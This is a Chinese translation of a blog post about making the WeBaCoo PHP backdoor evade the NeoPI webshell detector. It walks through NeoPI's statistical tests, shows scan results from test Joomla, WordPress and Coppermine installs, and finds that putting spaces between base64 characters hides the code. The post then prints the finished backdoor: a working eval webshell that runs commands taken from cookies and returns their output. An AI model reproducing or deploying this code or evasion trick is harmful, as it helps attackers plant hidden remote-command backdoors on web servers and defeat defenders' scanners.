为了加强WeBaCoo’s躲避恶意代码检测的能力,我最近不停的在测试各种各样隐藏Webshell代码的工具和方法。最新被我发现的一个工具是NeoPi,是一个python脚本。它使用各种各样的统计学方法在脚本文件中搜索潜在的被混淆或被编码的恶意代码。
NeoPI会根据信息熵,最长单词以及重合指数对恶意文件进行分级。不幸的是经过WeBaCoo’s Base64编码后的后门代码不能通过NeoPI的检测,被排在恶意文件分级的前十位。因此,为了发现一种有效的躲避检测的方法我进行对Neopy进行了一次深入分析。
我在之前的一篇文章中提到过NeoPI(web backdoor detection),尽管到现在我还没有发现在特定环境下这个工具有什么用>.<||
这个工具有五种测试类型:
1,信息熵(Entropy):通过使用ASCII码表来衡量文件的不确定性。(更多信息)
2,最长单词(Longest Word):最长的字符串也许潜在的被编码或被混淆。
3,重合指数(Index of Coincidence):低重合指数预示文件代码潜在的被加密或被混效过。(more info)
4,特征(Signature):在文件中搜索已知的恶意代码字符串片段。
5,压缩(Compression):对比文件的压缩比。(more info)
为了测试NeoPI’s在一个完整部署后的Web应用中的效果,我在debian的虚拟机上架设了三个CMS(Joomla,WordPress和Coppermine).在Web跟目录中我放置了两个由WebaCoo’s生成的文件webacoo.php(经过base64混淆)和webacoo_raw.php(原始未处理的php代码)。
为了让测试结果更精确,让其仅搜索后缀名为.php的文件。针对webroot路径下的所有测试产生的最初报告如下:
root@testbed:~# ./neopi.py -z -e -l -i -s /var/www/ \.php$
[[ Total files scanned: 10235 ]]
[[ Total files ignored: 0 ]]
[[ Scan Time: 48.170000 seconds ]]
[[ Top 10 entropic files for a given search ]]
6.1817 /var/www/gallery/lang/chinese_gb.php
6.1784 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
6.1710 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
5.8753 /var/www/blog/wp-admin/js/revisions-js.php
5.7846 /var/www/gallery/lang/japanese.php
5.7306 /var/www/webacoo.php
5.6484 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/cs.php
5.6296 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/sk.php
5.6203 /var/www/plugins/system/nonumberelements/helper.php
5.6133 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/pl.php
[[ Top 10 longest word files ]]
745 /var/www/gallery/include/exif_php.inc.php
745 /var/www/gallery/exifmgr.php
741 /var/www/gallery/lang/japanese.php
728 /var/www/blog/wp-admin/js/revisions-js.php
522 /var/www/blog/wp-includes/functions.php
516 /var/www/libraries/tcpdf/tcpdf.php
474 /var/www/plugins/content/jw_allvideos/includes/sources.php
456 /var/www/blog/wp-content/plugins/sexybookmarks/includes/html-helpers.php
436 /var/www/gallery/lang/chinese_gb.php
354 /var/www/blog/wp-includes/class-simplepie.php
[[ Average IC for Search ]]
0.0372679517799
[[ Top 10 lowest IC files ]]
0.0198 /var/www/webacoo.php
0.0206 /var/www/gallery/lang/chinese_gb.php
0.0217 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
0.0217 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
0.0217 /var/www/templates/system/index.php
0.0217 /var/www/administrator/templates/system/index.php
0.0222 /var/www/blog/wp-content/themes/lightword/alternatives/404.php
0.0226 /var/www/blog/wp-admin/js/revisions-js.php
0.0270 /var/www/includes/HTML_toolbar.php
0.0272 /var/www/templates/beez/html/com_user/reset/complete.php
[[ Top 10 signature match counts ]]
43 /var/www/gallery/include/themes.inc.php
43 /var/www/gallery/themes/sample/theme.php
26 /var/www/blog/wp-admin/includes/class-ftp.php
19 /var/www/blog/wp-content/plugins/nextgen-gallery/lib/imagemagick.inc.php
14 /var/www/libraries/geshi/geshi/php.php
13 /var/www/blog/wp-includes/Text/Diff/Engine/native.php
10 /var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php
9 /var/www/gallery/include/functions.inc.php
8 /var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/config.php
8 /var/www/blog/wp-admin/includes/class-wp-filesystem-ssh2.php
[[ Top 10 compression match counts ]]
1.0704 /var/www/administrator/templates/system/index.php
1.0704 /var/www/templates/system/index.php
1.0000 /var/www/blog/wp-content/plugins/sexybookmarks/includes/index.php
1.0000 /var/www/blog/wp-content/plugins/sexybookmarks/js/index.php
0.9663 /var/www/blog/wp-content/themes/lightword/alternatives/404.php
0.8958 /var/www/includes/mambo.php
0.8860 /var/www/includes/joomla.php
0.8821 /var/www/includes/vcard.class.php
0.8818 /var/www/includes/PEAR/PEAR.php
0.8796 /var/www/includes/HTML_toolbar.php
[[ Top cumulative ranked files ]]
122 /var/www/webacoo.php
202 /var/www/blog/wp-admin/js/revisions-js.php
528 /var/www/plugins/content/jw_allvideos/includes/elements/header.php
912 /var/www/plugins/content/jw_allvideos/includes/helper.php
984 /var/www/modules/mod_archive/helper.php
1100 /var/www/libraries/bitfolge/vcard.php
1210 /var/www/administrator/components/com_content/elements/article.php
1240 /var/www/gallery/addfav.php
1246 /var/www/administrator/components/com_installer/admin.installer.php
1258 /var/www/administrator/components/com_config/views/component/view.php可以看到webacoo_raw.php成功通过了检测,而混淆后的代码(webacoo.php)就没有那么幸运了。信息熵和重合指数都得到了很高的分数,在结果中被标记为恶意文件。除了这两个分数,被混淆后的代码在最长单词测试中也得到了最高分,但是这并不是非常明显,因为在我的测试环境中CMS里也有一些很长且正常的字符串或代码符合了检测的特征。
这些很高的分数是由于base64 payload对代码进行编码导致的。为了绕过它们,生成的代码必须使用一些新的特征来对付这些测试。
我的第一个想法是将编码后的代码拆分成小的块儿然后最后组合成一个完整的payload。但这样的想法在之后的测试中被发现并不能有效的绕过重合指数和信息熵的检测。
第二个方法是在编码后的代码中插入一些空格(空格并不是合法的base64字符),然后在解码前使用replace函数去除这些空格。
现在的问题是:每隔多少个base64字符后加上空格能使检测的结果最理想?为了找到这个最有效的值,我在代码中使用不同的分组大小(在1,5,10,20字符后)来间隔经过base64编码后的代码并建立了一系列文件。运行NeoPI来对比一下结果。
root@testbed:~# ./neopi.py -z -e -l -i -s /var/www/pwn/ \.php$
[[ Total files scanned: 30 ]]
[[ Total files ignored: 0 ]]
[[ Scan Time: 0.010000 seconds ]]
[[ Top 10 entropic files for a given search ]]
5.7646 /var/www/pwn/webacoo_new20.php
5.7306 /var/www/pwn/webacoo.php
5.6999 /var/www/pwn/webacoo_new10.php
5.5322 /var/www/pwn/webacoo_new5.php
5.1328 /var/www/pwn/webacoo_raw.php
4.2037 /var/www/pwn/webacoo_new1.php
[[ Top 10 longest word files ]]
295 /var/www/pwn/webacoo.php
94 /var/www/pwn/webacoo_raw.php
51 /var/www/pwn/webacoo_new1.php
51 /var/www/pwn/webacoo_new10.php
51 /var/www/pwn/webacoo_new5.php
51 /var/www/pwn/webacoo_new20.php
[[ Average IC for Search ]]
0.040872937004
[[ Top 10 lowest IC files ]]
0.0194 /var/www/pwn/webacoo_new20.php
0.0198 /var/www/pwn/webacoo.php
0.0224 /var/www/pwn/webacoo_new10.php
0.0301 /var/www/pwn/webacoo_raw.php
0.0338 /var/www/pwn/webacoo_new5.php
0.2009 /var/www/pwn/webacoo_new1.php
[[ Top 10 signature match counts ]]
1 /var/www/pwn/webacoo.php
1 /var/www/pwn/webacoo_raw.php
1 /var/www/pwn/webacoo_new1.php
1 /var/www/pwn/webacoo_new10.php
1 /var/www/pwn/webacoo_new5.php
1 /var/www/pwn/webacoo_new20.php
[[ Top 10 compression match counts ]]
0.8114 /var/www/pwn/webacoo_new10.php
0.8101 /var/www/pwn/webacoo_new20.php
0.7993 /var/www/pwn/webacoo.php
0.7947 /var/www/pwn/webacoo_new5.php
0.7593 /var/www/pwn/webacoo_raw.php
0.5407 /var/www/pwn/webacoo_new1.php
[[ Top cumulative ranked files ]]
8 /var/www/pwn/webacoo_new20.php
9 /var/www/pwn/webacoo.php
11 /var/www/pwn/webacoo_new10.php
17 /var/www/pwn/webacoo_new5.php
17 /var/www/pwn/webacoo_raw.php
22 /var/www/pwn/webacoo_new1.phpwebacoo_new20.php(每隔20个字符插入空格)表现的最差(甚至比之前不加空格的结果还差)。另一方面,webacoo_new1.php(每隔1个字符插入空格)在每部分的测试中都得到了最低的分数,成为了最有效的选择(甚至比原始未处理的代码表现还要好)。
因此,最新具备通过NeoPI检测的后门文件代码如下:
<?php $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = ")));?>root@testbed:~# ./neopi.py -z -e -l -i -s /var/www/ \.php$
[[ Total files scanned: 10230 ]]
[[ Total files ignored: 0 ]]
[[ Scan Time: 46.120000 seconds ]]
[[ Top 10 entropic files for a given search ]]
6.1817 /var/www/gallery/lang/chinese_gb.php
6.1784 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
6.1710 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
5.8753 /var/www/blog/wp-admin/js/revisions-js.php
5.7846 /var/www/gallery/lang/japanese.php
5.6484 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/cs.php
5.6296 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/sk.php
5.6203 /var/www/plugins/system/nonumberelements/helper.php
5.6133 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/pl.php
5.6060 /var/www/blog/wp-config.php
[[ Top 10 longest word files ]]
745 /var/www/gallery/include/exif_php.inc.php
745 /var/www/gallery/exifmgr.php
741 /var/www/gallery/lang/japanese.php
728 /var/www/blog/wp-admin/js/revisions-js.php
522 /var/www/blog/wp-includes/functions.php
516 /var/www/libraries/tcpdf/tcpdf.php
474 /var/www/plugins/content/jw_allvideos/includes/sources.php
456 /var/www/blog/wp-content/plugins/sexybookmarks/includes/html-helpers.php
436 /var/www/gallery/lang/chinese_gb.php
354 /var/www/blog/wp-includes/class-simplepie.php
[[ Average IC for Search ]]
0.0372700176166
[[ Top 10 lowest IC files ]]
0.0206 /var/www/gallery/lang/chinese_gb.php
0.0217 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
0.0217 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
0.0217 /var/www/templates/system/index.php
0.0217 /var/www/administrator/templates/system/index.php
0.0222 /var/www/blog/wp-content/themes/lightword/alternatives/404.php
0.0226 /var/www/blog/wp-admin/js/revisions-js.php
0.0270 /var/www/includes/HTML_toolbar.php
0.0272 /var/www/templates/beez/html/com_user/reset/complete.php
0.0273 /var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/cs.php
[[ Top 10 signature match counts ]]
43 /var/www/gallery/include/themes.inc.php
43 /var/www/gallery/themes/sample/theme.php
26 /var/www/blog/wp-admin/includes/class-ftp.php
19 /var/www/blog/wp-content/plugins/nextgen-gallery/lib/imagemagick.inc.php
14 /var/www/libraries/geshi/geshi/php.php
13 /var/www/blog/wp-includes/Text/Diff/Engine/native.php
10 /var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php
9 /var/www/gallery/include/functions.inc.php
8 /var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/config.php
8 /var/www/blog/wp-admin/includes/class-wp-filesystem-ssh2.php
[[ Top 10 compression match counts ]]
1.0704 /var/www/administrator/templates/system/index.php
1.0704 /var/www/templates/system/index.php
1.0000 /var/www/blog/wp-content/plugins/sexybookmarks/includes/index.php
1.0000 /var/www/blog/wp-content/plugins/sexybookmarks/js/index.php
0.9663 /var/www/blog/wp-content/themes/lightword/alternatives/404.php
0.8958 /var/www/includes/mambo.php
0.8860 /var/www/includes/joomla.php
0.8821 /var/www/includes/vcard.class.php
0.8818 /var/www/includes/PEAR/PEAR.php
0.8796 /var/www/includes/HTML_toolbar.php
[[ Top cumulative ranked files ]]
199 /var/www/blog/wp-admin/js/revisions-js.php
521 /var/www/plugins/content/jw_allvideos/includes/elements/header.php
907 /var/www/plugins/content/jw_allvideos/includes/helper.php
977 /var/www/modules/mod_archive/helper.php
1094 /var/www/libraries/bitfolge/vcard.php
1203 /var/www/administrator/components/com_content/elements/article.php
1233 /var/www/gallery/addfav.php
1240 /var/www/administrator/components/com_installer/admin.installer.php
1252 /var/www/administrator/components/com_config/views/component/view.php
1264 /var/www/xmlrpc/includes/framework.php这个最新的躲避Webshell检测的技术将在下一个版本应用到WebBaCoo中。
A. Bechtsoudis 译:Pnig0s[Freebuf]
